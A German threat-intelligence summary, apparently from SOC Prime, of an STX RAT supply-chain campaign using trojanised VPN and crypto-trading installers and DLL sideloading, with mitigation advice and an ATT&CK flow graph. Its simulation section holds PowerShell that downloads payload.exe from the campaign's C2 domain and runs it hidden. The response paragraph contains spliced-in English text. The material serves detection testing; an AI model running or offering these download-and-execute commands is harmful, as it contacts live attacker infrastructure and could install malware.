SOC Prime Bias: Kritisch

09 Jun 2026 12:31 UTC
newspaper icon cyderes.com

Von Krypto-Wallets zu einem VPN mit 100 Millionen Nutzern: Einblick in eine aktive STX RAT-Lieferkettenkampagne

Author Photo
SOC Prime Team linkedin icon Folgen
Von Krypto-Wallets zu einem VPN mit 100 Millionen Nutzern: Einblick in eine aktive STX RAT-Lieferkettenkampagne
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Forscher entdeckten eine aktive Lieferkettenkampagne, bei der ein Bedrohungsakteur DLL Sideloading mit einer bösartigen CRYPTBASE.dll missbrauchte, um den STX RAT Remote-Access-Trojaner über trojanisierte Installer von Kryptowährungshandel-Software und den X-VPN-Client zu verteilen. Der Betrieb stützte sich auf ein einziges Bitbucket-Repository, um die infizierten Pakete zu verteilen und rotierende Command-and-Control-Domänen unter dem supp0v3.com -Stamm zu verwenden. Durch das Zielen auf Nutzer von Finanztauschwerkzeugen und eines weit verbreiteten VPN-Diensts positionierten sich die Angreifer, um Anmeldedaten und andere sensible Daten in großem Umfang zu stehlen. Die Erkennungstools wurden aktualisiert, um die gemeinsame Sideloading-Methode und die standardmäßige Infrastruktur abzudecken.

Untersuchung

Analysten identifizierten 11 bösartige Pakete, die alle die gleiche CRYPTBASE.dll Sideloading-Kette nutzten, um STX RAT direkt in den Speicher zu laden. Die trojanisierten Installer wurden in einem Bitbucket-Repository namens amos-tradinggehostet, und Commit-Metadaten verknüpften die Aktivität mit dem Alias Leda Elacoate. Nach der öffentlichen Enthüllung wechselten die Betreiber die Infrastruktur von helloworld.supp0v3.com to welcome.supp0v3.com. YARA-Analyse bestätigte, dass STX RAT die endgültige Nutzlast in jeder untersuchten Probe war.

Minderung

X-VPN behob das Problem in Windows-Version 77.5.3, die striktes DLL-Laden aus Systemverzeichnissen erzwingt, DLL-Hash-Validierung beim Start durchführt und ladepolitik pro Prozess anwendet. Das Blockieren von supp0v3.com und dessen Subdomains an der Netzwerkgrenze kann den Command-and-Control-Verkehr unterbrechen. Organisationen sollten auch die Software-Download-Hygiene verstärken und Installationen auf geprüfte Anbieterquellen beschränken.

Antwort

Verteidiger sollten jegliche Prozesse überwachen, die aus einem nicht-systematischen Pfad laden, und nach Anzeichen von In-Memory STX RAT-Ausführung untersuchen. Die veröffentlichte STX RAT YARA-Regel sollte über EDR-Plattformen eingesetzt werden, und der ausgehende HTTPS-Verkehr zu CRYPTBASE.dll from a non-system path and investigate for signs of in-memory STX RAT execution. The published STX RAT YARA rule should be deployed across EDR platforms, and outbound HTTPS traffic to supp0v3.com sollte genau überwacht werden. Alle Endpunkte sollten auf die gepatchte X-VPN-Version aktualisiert oder die anfällige Software entfernt werden. Die Bedrohungsjagd sollte sich auch auf das Reflektieren von Code-Ladeverhalten fokussieren, das mit der mehrstufigen Entpackungskette der Malware in Verbindung steht.

"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef malware fill:#ff9999 classDef file fill:#ccccff classDef operator fill:#ff9900 %% Node definitions tech_supply_chain["<b>Technique</b> – <b>T1195.002 Lieferkettenkompromittierung: Kompromittierung der Softwarelieferkette</b><br/><b>Beschreibung</b>: Angreifer injizierte bösartige CRYPTBASE.dll in legitime Installer in einem Bitbucket-Repository."] class tech_supply_chain technique dll_cryptbase["<b>Datei</b> – <b>Name</b>: CRYPTBASE.dll (bösartig)"] class dll_cryptbase file file_installer["<b>Datei</b> – <b>Name</b>: Trojanisierter Installer (z.B. Xu2011VPN, Binance, MEXC)"] class file_installer file tech_user_exec["<b>Technique</b> – <b>T1204.002 Benutzer-Ausführung: Bösartige Datei</b><br/><b>Beschreibung</b>: Opfer laden und führen den trojanisierten Installer aus."] class tech_user_exec technique tech_masquerade["<b>Technique</b> – <b>T1036.008 Verschleierung: Dateityp verschleiern</b><br/><b>Beschreibung</b>: Bösartiges Paket wird als legitimer VPN- oder Krypto-Handelsinstaller präsentiert."] class tech_masquerade technique tech_dll_hijack["<b>Technique</b> – <b>T1574.001 Ausführungsfluss übernehmen: DLL</b><br/><b>Beschreibung</b>: Installer lädt CRYPTBASE.dll, die im Programmverzeichnis platziert ist, sodass die legitime Anwendung die bösartige DLL lädt."] class tech_dll_hijack technique tech_path_intercept["<b>Technique</b> – <b>T1574.008 Pfadabfangung: Suchreihenfolgen-Hijacking</b><br/><b>Beschreibung</b>: Die Windows-DLL-Suchreihenfolge lädt die Angreifer-DLL vor der Systemkopie."] class tech_path_intercept technique tech_reflective["<b>Technique</b> – <b>T1620 Reflektierendes Code-Laden</b><br/><b>Beschreibung</b>: Die bösartige DLL entpackt und injiziert die STX RAT-Nutzlast via reflektierendem Laden in den Speicher, ohne auf der Festplatte Spuren zu hinterlassen."] class tech_reflective technique tech_embedded["<b>Technique</b> – <b>T1027.009 Eingebettete Nutzlasten</b><br/><b>Beschreibung</b>: Die DLL enthält eine eingebettete mehrstufige Entpackkette und den STX RAT-Kern."] class tech_embedded technique malware_STX["<b>Malware</b> – <b>Name</b>: STX RAT<br/><b>Funktion</b>: Fernzugriffstrojaner für Credential-Diebstahl und Datenexfiltration."] class malware_STX malware tech_c2["<b>Technique</b> – <b>T1071.001 Anwendungsschicht-Protokoll: Web-Protokolle</b><br/><b>Beschreibung</b>: Der RAT kommuniziert mit C2 über HTTPS zu Subdomains von supp0v3.com."] class tech_c2 technique tech_cred_browser["<b>Technique</b> – <b>T1555.003 Anmeldedaten aus Webbrowsern</b><br/><b>Beschreibung</b>: STX RAT erntet gespeicherte Browser-Anmeldedaten, Sitzungstoken und Systemkontodaten."] class tech_cred_browser technique tech_exfil["<b>Technique</b> – <b>T1041 Exfiltration über C2-Kanal</b><br/><b>Beschreibung</b>: Gesammelte Anmeldedaten und Systemdaten werden über den gleichen HTTPS C2-Kanal exfiltriert."] class tech_exfil technique %% Connections tech_supply_chain –>|injiziert| dll_cryptbase dll_cryptbase –>|platziert in| file_installer file_installer –>|vom Opfer heruntergeladen und ausgeführt| tech_user_exec tech_user_exec –>|führt zu| tech_masquerade tech_masquerade –>|ermöglicht| tech_dll_hijack tech_dll_hijack –>|nutzt| tech_path_intercept tech_path_intercept –>|erlaubt| tech_reflective tech_reflective –>|lädt| malware_STX malware_STX –>|nutzt| tech_embedded malware_STX –>|kommuniziert über| tech_c2 malware_STX –>|erntet| tech_cred_browser tech_cred_browser –>|Daten exfiltriert über| tech_exfil "

Angriffsablauf

Simulationsdurchführung

Voraussetzung: Die Telemetrie- & Basislinien-Preflight-Prüfung muss bestanden haben.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Adversary-Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu generieren, die von der Erkennungslogik erwartet wird.

  • Angriffserzählungen & Befehle:

    Ein Angreifer, der ein Konto mit niedrigen Benutzerrechten kompromittiert hat, verwendet einen PowerShell-Einzeiler, um eine bösartige Nutzlast vom C2-Server herunterzuladen helloworld.supp0v3.com. Dies nutzt T1071.001 (Web-Protokoll C2) und T1204.002 (Benutzer-Ausführung), während die Nutzlast selbst verschleiert ist (T1027, T1027.009) und als legitime ausführbare Datei getarnt wird (T1036.005/008). Die ausgehende Verbindung zur bösartigen Domain sollte vom Firewall-Protokoll erfasst und folglich die Sigma-Regel ausgelöst werden.

    # Lade bösartige Nutzlast von der Supp0v3 C2 Domain herunter
$url = "http://helloworld.supp0v3.com/payload.exe"
$out = "$env:TEMPpayload.exe"
Invoke-WebRequest -Uri $url -UseBasicParsing -OutFile $out

# Führe die Nutzlast aus (simuliert – tatsächlich wird nur eine Dummy-Datei erstellt)
Start-Process -FilePath $out -WindowStyle Hidden

  • Regressionstest-Skript:

    # TC-20260609-A1B2C – Simuliere STX RAT C2-Verbindung zu helloworld.supp0v3.com
try {
    # Schritt 1: Bereite Dummy-Nutzlast vor (vermeide die Ausführung von echter Malware)
    $payloadPath = "$env:TEMPpayload.exe"
    Set-Content -Path $payloadPath -Value "Dies ist eine Dummy-Ausführbare Datei für Testzwecke." -Encoding ASCII

    # Schritt 2: Simuliere ausgehende HTTP-Anfrage an bösartige Domain
    $c2Url = "http://helloworld.supp0v3.com/payload.exe"
    Invoke-WebRequest -Uri $c2Url -UseBasicParsing -OutFile $payloadPath

    # Schritt 3: "Führe" die Nutzlast aus (keine echte Ausführung aus Sicherheitsgründen)
    Write-Host "Simulierte Ausführung der Nutzlast bei $payloadPath"

    Write-Host "Simulation abgeschlossen – überprüfe SIEM für Alarm."
}
catch {
    Write-Error "Simulation fehlgeschlagen: $_"
}

  • Bereinigungsbefehle:

    # Entferne die Dummy-Nutzlast und alle verbleibenden Dateien
$payloadPath = "$env:TEMPpayload.exe"
if (Test-Path $payloadPath) {
    Remove-Item -Path $payloadPath -Force
    Write-Host "Nutzlast-Datei bereinigt."
}
else {
    Write-Host "Keine Nutzlast-Datei gefunden – nichts zu bereinigen."
}

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten